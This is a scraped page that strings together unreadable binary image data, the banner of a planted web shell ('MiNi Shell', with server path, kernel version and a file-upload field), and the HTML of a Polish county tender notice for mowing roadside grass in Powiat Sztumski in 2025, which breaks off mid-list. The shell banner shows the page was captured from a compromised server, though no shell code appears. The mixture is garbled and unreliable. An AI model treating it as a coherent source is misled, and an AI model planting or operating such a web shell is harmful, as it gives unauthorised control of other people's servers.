JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250508/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250508/0022135501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa koszenia traw z poboczy dróg powiatowych na terenie Powiatu Sztumskiego w 2025 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Sztumski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192638080</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Mickiewicza 31</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sztum</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL638 - Starogardzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">552677420</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">organizacyjny@powiatsztumski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatsztumski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa koszenia traw z poboczy dróg powiatowych na terenie Powiatu Sztumskiego w 2025 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bb4ea108-4561-4186-a359-2acd90d28b3c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00221355</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00057230/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.34 Usługa koszenia traw z poboczy dróg powiatowych na terenie Powiatu Sztumskiego w 2025 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/transakcja/1106506 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.platformazakupowa.pl/transakcja/1106506</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Oferta oraz podmiotowe środki dowodowe, składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. UWAGA: Podpis osobisty to nie podpis odręczny.<br/>2.	W procesie składania oferty w tym podmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny Wykonawca może złożyć bezpośrednio na dokumencie, który następnie przesyła do systemu (opcja rekomendowana przez platformazakupowa.pl) oraz dodatkowo dla całego pakietu dokumentów w kroku 2 Formularza składania oferty (po kliknięciu w przycisk Przejdź do podsumowania).<br/><br/>Szczegółowo opisane w Rozdziale XIV SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowo opisany w Rozdziale II SWZ - Ochrona danych osobowych</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.272.9.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Zadanie nr 1 – Usługa koszenia traw z poboczy dróg powiatowych nr 2912G, 2913G, 3101G, 3102G, 3104G, 3110G, 3128G, 3129G, 3130G, 3131G.<br/>Lp.	Nr drogi	Nazwa drogi	Strony drogi	Długość drogi w metrach	Szerokość<br/>minimalna koszenia w m	Powierzchnia w m2<br/>1	2912G	Szropy - Złotowo	2	4352	1	8704<br/>2	2913G	DW 515 - Malewo	2	1610	1	3220<br/>3	3101G	Stary Targ - Kalwa	2	3219	1,5	9657<br/>4	3102G	Klecewo - Cierpięta	2	6949	1	13898<br/>5	3104G	Stary Targ - Balewo	2	9672	1	19344<br/>6	3110G	Stary Targ - Waplewo	2	3748	1,5	11244<br/>7	3128G	Żuławska Sztumska - Tropy Sztumskie	2	8644	1,5	25932<br/>8	3129G	Grzymały - Tropy Sztumskie	2	8654	1	17308<br/>9	3130G	Szropy - Jurkowice	2	3174	1	6348<br/>10	3131G	Łoza - Lasy	2	2701	1	5402<br/>RAZEM	52723 121057<br/>3.	Przedmiot zamówienia obejmuje w szczególności:<br/>1)	Dwukrotne w okresie trwania umowy:<br/>a)	mechaniczne koszenie traw i chwastów rosnących na poboczach dróg po obu stronach jezdni<br/>na szerokości minimum od 1,0 m do 1,5 m (zgodnie z wykazem dróg) – po wewnętrznych stronach łuków w zakresie zwiększonym w celu zapewnienia widoczności dla kierujących pojazdami, wraz z powierzchniami skrzyżowań w trójkącie widoczności i wysepkami w obrębie skrzyżowań,<br/>b)	obowiązkowe ręczne dokoszenie poboczy dróg wokół rosnących drzew, urządzeń infrastruktury tj.: znaków drogowych, balustrad, słupów, przystanków autobusowych, wzdłuż chodników na szerokość min. 1,5 m od zewnętrznej krawędzi chodnika, oraz w terenie zabudowanym miejscowości na całej szerokości pasa drogowego od krawędzi jezdni do ogrodzeń posesji przyległych do pasa drogowego.<br/>c)	Maksymalna wysokość traw po koszeniu - 5 cm od powierzchni gruntu.<br/>d)	Zamawiający wymaga by Wykonawca dysponował pełnosprawnym sprzętem i urządzeniami do wykonania zamówienia tj.: minimum jedną kosiarką rotacyjną lub bijakową wraz z nośnikiem, oraz minimum dwiema wykaszarkami ręcznymi na każde zadanie oddzielnie w przypadku realizacji więcej niż jednego zadania objętego przedmiotem zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77312000-0 - Usługi usuwania chwastów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Nr	Nazwa kryterium	Waga<br/>1.	Cena ryczałtowa brutto	60 %<br/>2.	Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II	40%<br/><br/>	Punkty przyznawane za podane wyżej kryteria będą liczone według następujących wzorów:<br/>Nr kryterium	Wzór<br/>1.	<br/>C=Cn/Cx x 60 waga<br/><br/>gdzie:<br/>C - ilość punktów za kryterium cena oferty brutto<br/>Cn - najniższa cena spośród wszystkich ofert<br/>Cx - cena oferty badanej<br/>2.	Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II – 40 waga<br/><br/>	Punkty w kryterium termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II zostaną przyznane według następujących zasad:<br/><br/>Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II	Liczba punktów<br/>skrócenie o 6 dni, tj. wykonanie zadania do 14 dni	40 pkt<br/>skrócenie o 4 dni, tj. wykonanie zadania do 16 dni	25 pkt<br/>skrócenie o 2 dni, tj. wykonanie zadania do 18 dni	10 pkt<br/>brak skrócenia, tj. wykonanie zadania do 20 dni	0 pkt<br/><br/>	W przypadku niewłaściwie lub błędnie wypełnionego przez Wykonawcę w formularzu ofertowym kryterium „Termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II” Zamawiający przyzna 0 punktów w tym kryterium, a jako deklarowany termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II zostanie przyjęty brak skrócenia, tj. wykonanie zadania do 20 dni.<br/>	Wykonawca deklaruje identyczny termin skrócenia wykonania zamówienia zarówno dla Etapu I jak i dla Etapu II, tj. jeżeli zadeklaruje termin skrócenia wykonania zamówienia o 6 dni, to znaczy, że termin ten obowiązuje dla Etapu I oraz dla Etapu II.<br/>	Wykonawca nie może zaoferować terminu zakończenia zamówienia dla Etapu I i dla Etapu II dłuższego niż do 20 dni. Termin zakończenia zamówienia dla Etapu I i dla Etapu II do 20 dni jest terminem maksymalnym.<br/>	Zamawiający nie będzie przyznawał punktów pośrednich w kryterium „Termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II” tzn. możliwe są do przyznania punkty odpowiednio: 0, 10, 25, 40. Maksymalna liczba punktów jaką może uzyskać Wykonawca w kryterium Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II wynosi 40 punktów.<br/>	Łączna ilość punktów dla badanej oferty będzie liczona wg następującego wzoru: <br/>S = C + T <br/>gdzie:	S – łączna suma punktów badanej oferty <br/>C – cena ryczałtowa brutto <br/>T – termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II <br/>	Ocena punktowa będzie dotyczyć wyłącznie ofert uznanych za ważne i nie podlegających odrzuceniu. Danych z ofert uznanych za nieważne nie bierze się pod uwagę przy obliczaniu punktacji.<br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów przy uwzględnieniu powyższych kryteriów.<br/>	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2)	Zadanie nr 2 – Usługa koszenia traw z poboczy dróg powiatowych nr 2936G, 3100G, 3111G, 3112G, 3123G, 3124G, 3125G, 3126G.<br/>Lp.	Nr drogi	Nazwa drogi	Strony drogi	Długość drogi w metrach	Szerokość minimalna<br/>koszenia w m	Powierzchnia w m2<br/>1	2936G	Dzierzgoń - Żuławska Sztumska - Stare Pole	<br/>2	<br/>13072	<br/>1,5	<br/>39216<br/>2	3100G	Dzierzgoń - Ramoty	2	15012	1,5	45036<br/>3	3111G	Olszówka - Tywęzy	2	2068	1	4136<br/>4	3112G	Tywęzy - Stanowo	2	3674	1	7348<br/>5	3123G	Żuławka Sztumska - Stalewo	2	1955	1	3910<br/>6	3124G	Budzisz - Jasna - Złotnica	2	6296	1	12592<br/>7	3125G	Jasna - Bągart - Nowiec	2	10734	1	21468<br/>8	3126G	Bągart - Święty Gaj - Stare Dolno	2	743	1	1486<br/>RAZEM	53554 135192<br/>3.	Przedmiot zamówienia obejmuje w szczególności:<br/>1)	Dwukrotne w okresie trwania umowy:<br/>a)	mechaniczne koszenie traw i chwastów rosnących na poboczach dróg po obu stronach jezdni<br/>na szerokości minimum od 1,0 m do 1,5 m (zgodnie z wykazem dróg) – po wewnętrznych stronach łuków w zakresie zwiększonym w celu zapewnienia widoczności dla kierujących pojazdami, wraz z powierzchniami skrzyżowań w trójkącie widoczności i wysepkami w obrębie skrzyżowań,<br/>b)	obowiązkowe ręczne dokoszenie poboczy dróg wokół rosnących drzew, urządzeń infrastruktury tj.: znaków drogowych, balustrad, słupów, przystanków autobusowych, wzdłuż chodników na szerokość min. 1,5 m od zewnętrznej krawędzi chodnika, oraz w terenie zabudowanym miejscowości na całej szerokości pasa drogowego od krawędzi jezdni do ogrodzeń posesji przyległych do pasa drogowego.<br/>c)	Maksymalna wysokość traw po koszeniu - 5 cm od powierzchni gruntu.<br/>d)	Zamawiający wymaga by Wykonawca dysponował pełnosprawnym sprzętem i urządzeniami do wykonania zamówienia tj.: minimum jedną kosiarką rotacyjną lub bijakową wraz z nośnikiem, oraz minimum dwiema wykaszarkami ręcznymi na każde zadanie oddzielnie w przypadku realizacji więcej niż jednego zadania objętego przedmiotem zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77312000-0 - Usługi usuwania chwastów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>	Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Nr	Nazwa kryterium	Waga<br/>1.	Cena ryczałtowa brutto	60 %<br/>2.	Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II	40%<br/><br/>	Punkty przyznawane za podane wyżej kryteria będą liczone według następujących wzorów:<br/>Nr kryterium	Wzór<br/>1.	<br/>C=Cn/Cx x 60 waga<br/><br/>gdzie:<br/>C - ilość punktów za kryterium cena oferty brutto<br/>Cn - najniższa cena spośród wszystkich ofert<br/>Cx - cena oferty badanej<br/>2.	Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II – 40 waga<br/><br/>	Punkty w kryterium termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II zostaną przyznane według następujących zasad:<br/><br/>Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II	Liczba punktów<br/>skrócenie o 6 dni, tj. wykonanie zadania do 14 dni	40 pkt<br/>skrócenie o 4 dni, tj. wykonanie zadania do 16 dni	25 pkt<br/>skrócenie o 2 dni, tj. wykonanie zadania do 18 dni	10 pkt<br/>brak skrócenia, tj. wykonanie zadania do 20 dni	0 pkt<br/><br/>	W przypadku niewłaściwie lub błędnie wypełnionego przez Wykonawcę w formularzu ofertowym kryterium „Termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II” Zamawiający przyzna 0 punktów w tym kryterium, a jako deklarowany termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II zostanie przyjęty brak skrócenia, tj. wykonanie zadania do 20 dni.<br/>	Wykonawca deklaruje identyczny termin skrócenia wykonania zamówienia zarówno dla Etapu I jak i dla Etapu II, tj. jeżeli zadeklaruje termin skrócenia wykonania zamówienia o 6 dni, to znaczy, że termin ten obowiązuje dla Etapu I oraz dla Etapu II.<br/>	Wykonawca nie może zaoferować terminu zakończenia zamówienia dla Etapu I i dla Etapu II dłuższego niż do 20 dni. Termin zakończenia zamówienia dla Etapu I i dla Etapu II do 20 dni jest terminem maksymalnym.<br/>	Zamawiający nie będzie przyznawał punktów pośrednich w kryterium „Termin skrócenia zakończenia zamówienia dla Etapu I i dla Etapu II” tzn. możliwe są do przyznania punkty odpowiednio: 0, 10, 25, 40. Maksymalna liczba punktów jaką może uzyskać Wykonawca w kryterium Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II wynosi 40 punktów.<br/>	Łączna ilość punktów dla badanej oferty będzie liczona wg następującego wzoru: <br/>S = C + T <br/>gdzie:	S – łączna suma punktów badanej oferty <br/>C – cena ryczałtowa brutto <br/>T – termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II <br/>	Ocena punktowa będzie dotyczyć wyłącznie ofert uznanych za ważne i nie podlegających odrzuceniu. Danych z ofert uznanych za nieważne nie bierze się pod uwagę przy obliczaniu punktacji.<br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów przy uwzględnieniu powyższych kryteriów.<br/>	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin skrócenia wykonania zamówienia dla Etapu I i dla Etapu II</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3)	Zadanie nr 3 - Usługa koszenia traw z poboczy dróg powiatowych nr 3117G, 3118G, 3119G, 3121G, 3122G, 3127G, 3132G, 3133G, 3134G, 3139G 3145G.<br/>Lp.	Nr drogi	Nazwa drogi	Strony drogi	Długość drogi w metrach	Szerokość minimalna<br/>koszenia w m	Powierzchnia w m2<br/>1	3117G	Matule - Stary Dzierzgoń	2	4657	1,5	13971<br/>2	3118G	Protowo - Myślice	2	4541	1	9082<br/>3	3119G	Pronie – (Tabory) 2	3270	1	6540<br/>4	3121G	Stare Miasto - Folwark	2	7788	1	15576<br/>5	3122G	Dzierzgoń - Pronie	2	10309	1	20618<br/>6	3127G	Stary Dzierzgoń - Bądze	2	8198	1	16396<br/>7	3132G	Najetki - Lubachowo	2	2000	1	4000<br/>8	3133G	Rychliki - Latkowo	2	7694	1,5	23082<br/>9	3134G	Dojazd z drogi 526 do PKP Myślice	2	304	1	608<br/>10	3139G	Bądze -Kamieniec	2	258	1	516<br/>11	3145G	Obrzynowo - Monastarzysko - DW 515	2	8317	1,5	24951<br/>RAZEM	54066 135340<br/>3.	Przedmiot zamówienia obejmuje w szczególności:<br/>1)	Dwukrotne w okresie trwania umowy:<br/>a)	mechaniczne koszenie traw i chwastów rosnących na poboczach dróg po obu stronach jezdni<br/>na szerokości minimum od 1,0 m do 1,5 m (zgodnie z wykazem dróg) – po wewnętrznych stronach łuków w zakresie zwiększonym w 